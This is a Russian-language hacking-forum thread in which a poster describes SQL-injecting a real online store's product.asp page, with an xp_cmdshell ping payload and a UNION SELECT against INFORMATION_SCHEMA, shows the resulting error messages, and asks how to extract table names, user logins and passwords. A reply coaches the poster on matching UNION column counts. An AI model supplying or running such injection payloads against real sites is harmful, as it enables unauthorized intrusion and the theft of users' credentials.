Недавно Друг Сообщил Что Он Заказал MP3 С Интернет Магазина, Прошло 3 Месяца а MP3 Так и Не Пришел.

Я решил взгянуть на сайт этого магазина переход по страницам там такой:

/product.asp?f=1710

Я проверил следуйщий запрос (Проверить Тупость Админа):

/product.asp?f=1710%20%20';%20exec%20master..xp_cmd shell%20'ping%2010.10.1.2'%20--

В Ответ получил следуйщие:
-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC SQL Server Driver][SQL Server]EXECUTE permission denied on object 'xp_cmdshell', database 'master', owner 'dbo'.

/includes/header.asp, line 17
------------------------------------------------------------

У админа есть немного мозгов =))

Другим запросом узнал название базы, НО когда пытаюсь выполнить запрос с UNION выдаёт следуйшие:
(Запрос был таков: /product.asp?f=1710 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--)


-------------------------------------------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
------------------------------------------------------------

Подскажи как получить название таблиц,логины,и пароли юзеров. Заранее Спасибо за помошь.

На вот десь почитай, Егорыч хорошую статью выложил, ну мож не много не по твоей теме, но суть подходит.
http://forum.antichat.ru/showthread.php?t=5171

Тут надо к Егору обращаться... Он в Iss намного больше меня разбирается.

Ну так с UNION вот какая проблема.
Дело в том что на корявом языке MS это называется как ты написал.
У тебя SELECT перед UNION имеет не столько же колонок сколько SELECT после UNION.
Пример
правильно:
SELECT 1,1,1,2 UNION SELECT 0,0,2,1
Неправильно:
SELECT 1,1,1,2 UNION SELECT 0,1,2